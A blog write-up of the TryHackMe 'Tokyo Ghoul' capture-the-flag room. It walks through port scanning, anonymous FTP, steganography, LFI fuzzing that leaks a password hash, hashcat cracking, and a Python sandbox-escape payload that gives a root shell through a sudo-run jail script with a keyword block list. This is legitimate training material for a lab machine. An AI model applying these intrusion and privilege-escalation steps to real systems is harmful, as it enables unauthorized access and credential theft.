Tokyo Ghoul — TryHackMe

Tokyo Ghoul — THM

This is a write-up for TryHackme’s room named “Tokyo Ghoul”. Please find this room here:

https://tryhackme.com/room/tokyoghoul666

Task is to find the user and root’s flag and along the way answer the questions asked. So let’s Help kaneki escape jason room and start enumeration process using NMAP.

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.0.178

$ sudo nmap -sS -Pn -T4 -p- 10.10.0.178
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.178

$ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.178

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 ftp ftp 4096 Jan 23 22:26 need_Help?
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.98.192
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fa:9e:38:d3:95:df:55:ea:14:c9:49:d8:0a:61:db:5e (RSA)
| 256 ad:b7:a7:5e:36:cb:32:a0:90:90:8e:0b:98:30:8a:97 (ECDSA)
|_ 256 a2:a2:c8:14:96:c5:20:68:85:e5:41:d0:aa:53:8b:bd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome To Tokyo goul

From the scan results we can answer the question asked in first section.

HTTP Port 80

Checking Web Port 80 using a browser, found the following text in the Web Page’s source of the link on the main page(Can you help him escape?)

<!-- look don't tell jason but we will help you escape , here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there you will find a friend who will help you -->

OK, so let’s check out the FTP which has anonymous access enabled.

FTP

Found these 3 files by checking all the directories accessible by FTP:

  • Aogiri_tree.txt : this gives us hint that we are after someone called “Rize”
  • need_to_talk: this gives is key for “Rize” exe
  • rize_and_kaneki.jpg: To get other note from Rize

Ran rabin -z on need_to_talk executable and found the key, which is used as input after running need_to_talk

rabin2

Ghidra can also be used to analyse this exe and if we hover the mouse on the values highlighted in the middle section, that will give us the key:

ghidra

Finally the exe gave us the key for rize_and_kaneki.jpg which was cracked using steghide :

$ steghide info rize_and_kaneki.jpg
"rize_and_kaneki.jpg":
format: jpeg
capacity: 2.7 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "yougotme.txt":
size: 377.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf rize_and_kaneki.jpg
Enter passphrase:
wrote extracted data to "yougotme.txt".
$ cat yougotme.txt
haha you are so smart kaneki but can you talk my code
..... .-
....- ....-
....- -....
--... ----.
....- -..
...-- ..---
....- -..
...-- ...--
....- -..
....- ---..
....- .-
...-- .....
..... ---..
...-- ..---
....- .
-.... -.-.
-.... ..---
-.... .
..... ..---
-.... -.-.
-.... ...--
-.... --...
...-- -..
...-- -..
if you can talk it all right you got my secret directory

This looks like Morse Code. Using CyberChef to decode this:

cyberchef

This gives us a directory, which after appending to the main web-page gives us a hint to scan it, so using FFUF to scan this:

$ ffuf -u http://10.10.3.63/[REDACTED]/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c        /'___\  /'___\           /'___\       
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://10.10.3.63/[REDACTED]/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 312, Words: 21, Lines: 15]
claim [Status: 301, Size: 325, Words: 20, Lines: 10]
.html [Status: 403, Size: 275, Words: 20, Lines: 10]
.php [Status: 403, Size: 275, Words: 20, Lines: 10]
[Status: 200, Size: 312, Words: 21, Lines: 15]
:: Progress: [882184/882184] :: Job [1/1] :: 1840 req/sec :: Duration: [0:09:05] :: Errors: 0 ::

So lets browse to the “claim” directory via the browser:

And the by clicking on either YES or NO we can see a param “view” which can be checked for Local File Inclusion vulnerability:

LFI param

Capture this request in the BurpSuite and then send it to the Intruder tab and use the following LFI list from seclist which by default comes with kali as the payload:

/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt

burp intruder LFI

Ah ha, it worked and the username and password hash for rize are exposed.Put the hash found above in a file named hash.txt and taking the hash type starting with $6$ from hashcat website:

hashcat examples

Use the following command to crack the password hash:

hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

The hash will be cracked very fast, as it is a very commonly used password :)

User.txt

Now use the rize’s username and password found above and login using SSH on to the target.User flag is in rize’s home directory:

user flag

Root.txt

Now check what rize can run on the target as root using sudo -l :

sudo -l

So rize can run jail.py . Let’s have a look at it:

#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
print("Hi! Welcome to my world kaneki")
print("===========================================================")
print("What ? You gonna stand like a chicken ? fight me Kaneki")
text = input('>>> ')
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
if keyword in text:
print("Do you think i will let you do this ??????")
return;
else:
exec(text)
print('No Kaneki you are so dead')
if __name__ == "__main__":
main()

We need to break this “jail” as few of the keyword listed in the for loop above will not let us execute the python commands which can give us the root shell. Also we cannot edit this file as we don’t have the permission to do so.Found a lot of techniques here to bypass python sandboxes and the python builtins proved to be very useful to bypass the restrictions and used the following as input to the jail.py script:

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')

And ran this to get the root shell:

sudo /usr/bin/python3 /home/kamishiro/jail.py

root flag

Hope you enjoyed reading it as I had a lot of fun solving this challenge specially the python jail break and learned a new thing.Thanks for reading and have a nice day!

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Learning to create a Node.js server as a Mobile Developer

Guide To Cron Jobs

Deploy Docker containers into Digital Ocean

Why and When should you use React with Ruby on Rails

Cultural Amp employee feedback platform

Using FileSystem API to write data to HDFS

Introducing Script-level Debugger

An Intro to Features

Using Retrofit 2 for web-services in Android with a simple demo project.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

TryHackme : Dear QA

Network Services 2 (SMTP) — Tryhackme

HTB —Beep Writeup